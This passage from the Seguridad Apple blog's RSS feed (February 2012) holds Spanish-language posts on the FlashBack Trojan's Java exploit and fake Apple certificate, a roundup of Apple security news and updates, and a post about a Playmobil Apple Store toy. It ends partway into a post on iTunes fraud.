&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En noviembre Apple sacó una &lt;a href="http://www.seguridadapple.com/2011/11/apple-parchea-17-vulnerabilidades-en.html"&gt;actualización de seguridad crítica de Java para Mac OS X en la que parcheaba 17 vulnerabilidades&lt;/a&gt;. Rápidamente algunas de ellas se hicieron muy populares debido a la facilidad de explotación y su consistencia, como el exploit &lt;a href="http://www.seguridadapple.com/2011/12/tomando-el-control-de-mac-os-x-traves.html"&gt;Java Rhino que saca partido a la vulnerabilidad con CVE-2011-3544 y que fue incluido en Metasploit&lt;/a&gt;. Sin embargo, como era de esperar, no tardo mucho en aparecer &lt;a href="http://www.seguridadapple.com/2011/12/java-rhino-cve-2011-3544-llego-los-kits.html"&gt;este exploit en los kits de explotación&lt;/a&gt;, para atacar a sistemas sin actualizar. De ahí, a terminar en los paquetes de distribución de malware conocido era un paso, ya que estos se basan en la misma filosofía de los kits de explotación.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-hh9BE0f_3Gg/TzdnhB2bDpI/AAAAAAAADAY/VL2qKlPBvQM/s1600/java-certificate.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-hh9BE0f_3Gg/TzdnhB2bDpI/AAAAAAAADAY/VL2qKlPBvQM/s1600/java-certificate.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Certificado digital autofirmado usado por FlashBack Trojan&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sin embargo, la evolución de &lt;i&gt;&lt;b&gt;FlashBack Trojan&lt;/b&gt;&lt;/i&gt; no se ha quedado sólo en el uso de los bugs de &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt;, sino que también ha modificado su comportamiento para, en caso de no estar instalado &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt; o estar parcheado, engañar al usuario mediante la ejecución de un código autofirmado por un supuesto certificado digital de Apple, como se puede ver en la &lt;i&gt;Figura 1&lt;/i&gt;.&amp;nbsp;Sea por el medio que sea, una vez infectado el equipo, el malware se descarga en &lt;i&gt;&lt;b&gt;/tmp&lt;/b&gt;&lt;/i&gt;, se da permisos de ejecución y se instala.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para prevenir este tipo de amenazas te recomendamos que compruebes que tu sistema está totalmente actualizado, recuerda que puedes &lt;a href="http://www.seguridadapple.com/2012/02/configuracion-de-actualizaciones-en-mac.html"&gt;comprobar que tienes la última versión de Java instalada&lt;/a&gt;, y que para los usuarios de sistemas operativos &lt;i&gt;&lt;b&gt;Mac OS X Leopard&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;Mac OS X Tiger&lt;/b&gt;&lt;/i&gt;, &lt;a href="http://www.seguridadapple.com/2011/12/es-seguro-seguir-usando-mac-os-x.html"&gt;Apple no ofrece ningún parche de seguridad para Java&lt;/a&gt;, luego la responsabilidad de defender el sistema es sólo vuestra. Así que tenéis que actualizar manualmente la máquina de &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt; desde los repositorios oficiales e instalar una solución antimalware para mitigar ne la medida de lo posible estas amenazas.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-3838390998219979862?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=OfDflEsGMQI:L6UWPqHojlY:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=OfDflEsGMQI:L6UWPqHojlY:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=OfDflEsGMQI:L6UWPqHojlY:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/OfDflEsGMQI/flashback-trojan-infecta-mac-os-x-sin.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-kCSDRLFgMAc/TzdpYgtbgtI/AAAAAAAADAg/9PDoaAnIQag/s72-c/OSX_Flashback.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/flashback-trojan-infecta-mac-os-x-sin.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-1442229887077261833</guid><pubDate>Sun, 12 Feb 2012 06:25:00 +0000</pubDate><atom:updated>2012-02-12T07:25:00.172+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">SeguridadApple.com</category><title>Fue noticia en Seguridad Apple: del 30 de Enero al 12 de Febrero</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://1.bp.blogspot.com/-UCFoFvF6hJQ/TzavtDX1YCI/AAAAAAAAC_4/4OvxHBub5r8/s1600/fuenoticia.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-UCFoFvF6hJQ/TzavtDX1YCI/AAAAAAAAC_4/4OvxHBub5r8/s200/fuenoticia.jpg" width="173" /&gt;&lt;/a&gt;Hoy Domingo toca resumen de actividad de estas dos últimas dos semanas, así que vamos a empezar con lo que nos ha llamado suficientemente la atención como para publicarlo aquí, en &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Comenzamos el 30 de Enero con un artículo en el que &lt;a href="http://www.seguridadapple.com/2012/01/los-servicios-en-mac-os-x-lion-deben.html"&gt;nos quejamos de la poca información que ofrecen los servicios de Mac OS X cuando quieren acceder a un keychain&lt;/a&gt; para usar una credencial. Actualmente sólo se obtiene el nombre del ejecutable y un mensaje de ayuda genérico sobre los servicios, lo que da poca información a un usuario, lo que abre siempre puertas a los atacantes.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El último día de enero nos encontramos con &lt;a href="http://www.seguridadapple.com/2012/01/actulizaciones-para-airport-airport.html"&gt;actualizaciones de los productos AirPott&lt;/a&gt; de Apple, con nuevas actualizaciones y una nueva versión de &lt;i&gt;&lt;b&gt;AirPort Utility 6.0&lt;/b&gt;&lt;/i&gt; para Mac OS X.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El día 1 de Febrero le tocó el turno a una prueba de concepto sobre cómo &lt;a href="http://www.seguridadapple.com/2012/02/saltarse-el-control-de-lockdown-en.html"&gt;saltarse el bloqueo de LockDown Pro&lt;/a&gt; mediante el envío de una llamada al número de teléfono que se quiere desbloquear. Demasiado sencillo como para que &lt;i&gt;&lt;b&gt;LockDown Pro&lt;/b&gt;&lt;/i&gt; tenga utilidad conocido este bug.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://1.bp.blogspot.com/-knhy8Ht2DGg/TzawJG5hL_I/AAAAAAAADAA/66v-mUhbMwk/s1600/File-Vault.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-knhy8Ht2DGg/TzawJG5hL_I/AAAAAAAADAA/66v-mUhbMwk/s200/File-Vault.png" width="200" /&gt;&lt;/a&gt;El día 2 llegaron la actualización del sistema &lt;a href="http://www.seguridadapple.com/2012/02/mac-os-x-1074-security-update-2012-001.html"&gt;Mac OS X Lion 10.7.3&lt;/a&gt; y la actualización de seguridad para &lt;a href="http://www.seguridadapple.com/2012/02/mac-os-x-1074-security-update-2012-001.html"&gt;Mac OS X Snow Leopard 2012-001&lt;/a&gt; con un pequeño update de &lt;i&gt;&lt;b&gt;Safari&lt;/b&gt;&lt;/i&gt; a la versión &lt;i&gt;&lt;b&gt;5.1.3&lt;/b&gt;&lt;/i&gt;. Pero no vinieron solas, ya que junto a ellas vino &lt;i&gt;&lt;b&gt;Apple Remote Desktop 3.5.2&lt;/b&gt;&lt;/i&gt; y &lt;i&gt;&lt;b&gt;Server Admin Tools 10.7.3&lt;/b&gt;&lt;/i&gt;. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El viernes 3 de febrero hablamos del anuncio de la empresa &lt;i&gt;&lt;b&gt;Passware&lt;/b&gt;&lt;/i&gt; de que era capaz de &lt;a href="http://www.seguridadapple.com/2012/02/passware-descifra-filevault-de-mac-os-x.html"&gt;descifrar FileVault de Mac OS X Snow Leopard y FileVault 2 de Mac OS X Lion&lt;/a&gt; en menos de 40 minutos mediante un ataque a un equipo encendido, lo que rompería la seguridad de todos los sistemas que estuvieran suspendidos en lugar de apagados.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ese mismo día, algo de humor, una &lt;a href="http://www.seguridadapple.com/2012/02/apple-vs-nokia-pero-no-por-patentes.html"&gt;comparación entre los antiguos teléfonos Nokia y un terminal iPhone&lt;/a&gt;. Es antigua, pero nos hizo mucha gracia al volver a verla años después.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para el sábado dejamos una pequeña lista de los &lt;a href="http://www.seguridadapple.com/2012/02/problemas-en-mac-os-x-1073-y-security.html"&gt;problemas que generaron las actualizaciones de Mac OS X&lt;/a&gt;. &lt;a href="http://www.seguridadapple.com/2012/02/mac-os-x-1074-security-update-2012-001.html"&gt;Mac OS X Lion 10.7.3&lt;/a&gt; en algunos equipos dejó sin funcionar todas las aplicaciones y hubo que buscar soluciones alternativas de soporte bastante complejas. &lt;a href="http://www.seguridadapple.com/2012/02/mac-os-x-1074-security-update-2012-001.html"&gt;Mac OS X Snow Leopard con la Security Update 2012-001&lt;/a&gt; rompió &lt;i&gt;&lt;b&gt;Rosetta&lt;/b&gt;&lt;/i&gt; y hasta salió un parche de la comunidad, llamado &lt;i&gt;&lt;b&gt;Rosetta Fix&lt;/b&gt;&lt;/i&gt;, antes de que Apple re-publicara el &lt;a href="http://www.seguridadapple.com/2012/02/mac-os-x-1074-security-update-2012-001.html"&gt;Security Update 2012-001&lt;/a&gt;. Para algunos empieza a ser una lotería actualizar el sistema Mac OS X.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://3.bp.blogspot.com/-eEN-2rk-dTU/TzawhvmlkfI/AAAAAAAADAI/RkGUeaA9nbM/s1600/Jad_0.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="126" src="http://3.bp.blogspot.com/-eEN-2rk-dTU/TzawhvmlkfI/AAAAAAAADAI/RkGUeaA9nbM/s200/Jad_0.png" width="200" /&gt;&lt;/a&gt;El lunes 6 de Febrero hicimos una reseña a la utilidad &lt;a href="http://www.seguridadapple.com/2012/02/jad-un-decompilador-de-java-para-mac-os.html"&gt;Jad, un decompilador de Java&lt;/a&gt; que permite hacer análisis de código a aplicaciones &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt;, tanto de escritorio como &lt;i&gt;&lt;b&gt;Applets&lt;/b&gt;&lt;/i&gt;. Una herramienta que siempre debes tener a mano.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El martes os dejamos &lt;a href="http://www.seguridadapple.com/2012/02/configuracion-de-actualizaciones-en-mac.html"&gt;tres tips para configurar las actualizaciones de software en Mac OS X&lt;/a&gt;. Tres ideas para evitar que se descarguen paquetes de gran tamaño en momentos poco apropiados, para saber qué software está actualizado y para revisar en el acto el software disponible en los servidores de Apple.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El miércoles os informamos del estado de plazas en el &lt;a href="http://www.seguridadapple.com/2012/02/quedan-4-plazas-para-el-rootedlab-de.html"&gt;RootedLab de Análisis forense de iDevices (iPhone, iPad e iPod Touch)&lt;/a&gt; que va a impartir nuestro compañero &lt;i&gt;&lt;b&gt;Juan Garrido "Silverhack"&lt;/b&gt;&lt;/i&gt;. Aún puedes reservar la tuya.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://4.bp.blogspot.com/-CE8iF3qcdqI/TzaxJt_DnhI/AAAAAAAADAQ/_u96KeAV4lw/s1600/iphone-facetime-lisa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-CE8iF3qcdqI/TzaxJt_DnhI/AAAAAAAADAQ/_u96KeAV4lw/s200/iphone-facetime-lisa.png" width="133" /&gt;&lt;/a&gt;El 9 de Febrero segunda oleada de &lt;a href="http://www.seguridadapple.com/2012/02/apple-anade-soporte-de-lion-internet.html"&gt;actualizaciones de firmware para más modelos Mac del año 2010 con el objetivo de dotarles también de soporte para Lion Internet Revovery&lt;/a&gt;. Hay que tener presente que tanto en estas updates como en las anteriores, algunas de ellas solucionaban fallos de funcionamiento, por lo que hay que actualizar en cuanto se pueda para solucinarlos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ese mismo día salto a la luz un &lt;a href="http://www.seguridadapple.com/2012/02/un-bug-en-ios-501-permite-hacer.html"&gt;bug de iOS 5.0.1&lt;/a&gt; que permite a un atacante, aun con el iPhone bloquedado por código, realizar llamadas por medio de &lt;i&gt;&lt;b&gt;FaceTime&lt;/b&gt;&lt;/i&gt; usando el control de voz en llamadas de emergencia. Además de ese fallo, también se puede inspeccionar la lista de contactos en la agenda, o poner música.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El viernes 10 nuestra reseña fue para un artículo de &lt;i&gt;&lt;b&gt;The Global Mail&lt;/b&gt;&lt;/i&gt; en el que constata que &lt;a href="http://www.seguridadapple.com/2012/02/las-mafias-siguen-haciendo-su-negocio.html"&gt;las mafias siguen campando en iTunes&lt;/a&gt; y robando dinero a los clientes. Algo que ya habíamos comentado hace un año y que Apple aún no ha podido detener de forma taxativa.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por último, ayer sábado os trajimos la simpática noticia de la creación de &lt;i&gt;&lt;b&gt;PlayMobil&lt;/b&gt;&lt;/i&gt; de una auténtica &lt;a href="http://www.seguridadapple.com/2012/02/ya-puedes-comprarte-tu-apple-store-de.html"&gt;Apple Store para que con tus Clicks&lt;/a&gt; prepares el lanzamiento de &lt;i&gt;&lt;b&gt;iPad 3&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Y esto ha sido todo, que como veis no ha sido poco. Esperamos que con este resumen puedas estar al día de todo lo acaecido y que te permita de un vistazo mantenerte al día sobre la actualidad de seguridad alrededor de las tecnologías Apple.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-1442229887077261833?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=dvKw3wfflBI:MwSCmjyB68w:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=dvKw3wfflBI:MwSCmjyB68w:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=dvKw3wfflBI:MwSCmjyB68w:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/dvKw3wfflBI/fue-noticia-en-seguridad-apple-del-30.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-UCFoFvF6hJQ/TzavtDX1YCI/AAAAAAAAC_4/4OvxHBub5r8/s72-c/fuenoticia.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/fue-noticia-en-seguridad-apple-del-30.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-2353143255678284379</guid><pubDate>Sat, 11 Feb 2012 06:22:00 +0000</pubDate><atom:updated>2012-02-11T07:22:00.058+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Steve Jobs</category><category domain="http://www.blogger.com/atom/ns#">Apple Store</category><category domain="http://www.blogger.com/atom/ns#">Juegos</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>Ya puedes comprarte tu Apple Store de Playmobil y jugar</title><description>&lt;div style="text-align: justify;"&gt;La verdad es que nos ha sacado una buena sonrisa ver este juguete para que les montes a tus &lt;i&gt;&lt;b&gt;Clicks&lt;/b&gt;&lt;/i&gt; su propia &lt;i&gt;&lt;b&gt;Apple Store&lt;/b&gt;&lt;/i&gt;. Así, puedes recrear tus momentos más estelares con el lanzamiento de iPhone 4S o imaginar como será el de iPad 3.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-CucjgYB37qo/TzP8Dz0zEBI/AAAAAAAAC_Y/YWZZidrSuGs/s1600/AppleStorePlaymobil.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-CucjgYB37qo/TzP8Dz0zEBI/AAAAAAAAC_Y/YWZZidrSuGs/s1600/AppleStorePlaymobil.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: La Apple Store de Playmobil en &lt;a href="http://www.thinkgeek.com/interests/looflirpa/e8bb/"&gt;Think Geek&lt;/a&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El número de accesorios es grande, e incluso hay algunos muñecos que mantienen la estética de &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt; hablando en el teatro.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ThtNTdeCdfI/TzP7578BQXI/AAAAAAAAC_Q/DDKdhUpemFM/s1600/playmobil_apple_store_grid_embed.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-ThtNTdeCdfI/TzP7578BQXI/AAAAAAAAC_Q/DDKdhUpemFM/s1600/playmobil_apple_store_grid_embed.jpg" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Ambientes de la Apple Store&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;El caso es que la diversión no tiene que parar, así que puedes pasar horas con ello. Mira este vídeo y toma ideas.&lt;/div&gt;&lt;center&gt;&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/oSU3ijxkp8Y" width="540"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;
Disfruta el fin de semana que tenemos.&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-2353143255678284379?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gp-dgraFvKg:PRTOloWDz2s:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gp-dgraFvKg:PRTOloWDz2s:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gp-dgraFvKg:PRTOloWDz2s:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/gp-dgraFvKg/ya-puedes-comprarte-tu-apple-store-de.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-CucjgYB37qo/TzP8Dz0zEBI/AAAAAAAAC_Y/YWZZidrSuGs/s72-c/AppleStorePlaymobil.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/ya-puedes-comprarte-tu-apple-store-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-3953199522577716217</guid><pubDate>Fri, 10 Feb 2012 06:29:00 +0000</pubDate><atom:updated>2012-02-10T07:29:49.102+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Hacked</category><category domain="http://www.blogger.com/atom/ns#">Estafas</category><category domain="http://www.blogger.com/atom/ns#">Mac App Store</category><category domain="http://www.blogger.com/atom/ns#">App Store</category><category domain="http://www.blogger.com/atom/ns#">Apple</category><title>Las mafias siguen haciendo su negocio en iTunes</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7_rMcoI-JT4/TzS4brxibSI/AAAAAAAAC_s/8Lts9yk5EtM/s1600/iTunesHacked.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="131" src="http://4.bp.blogspot.com/-7_rMcoI-JT4/TzS4brxibSI/AAAAAAAAC_s/8Lts9yk5EtM/s200/iTunesHacked.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Hace ya casi un año publicamos en &lt;a 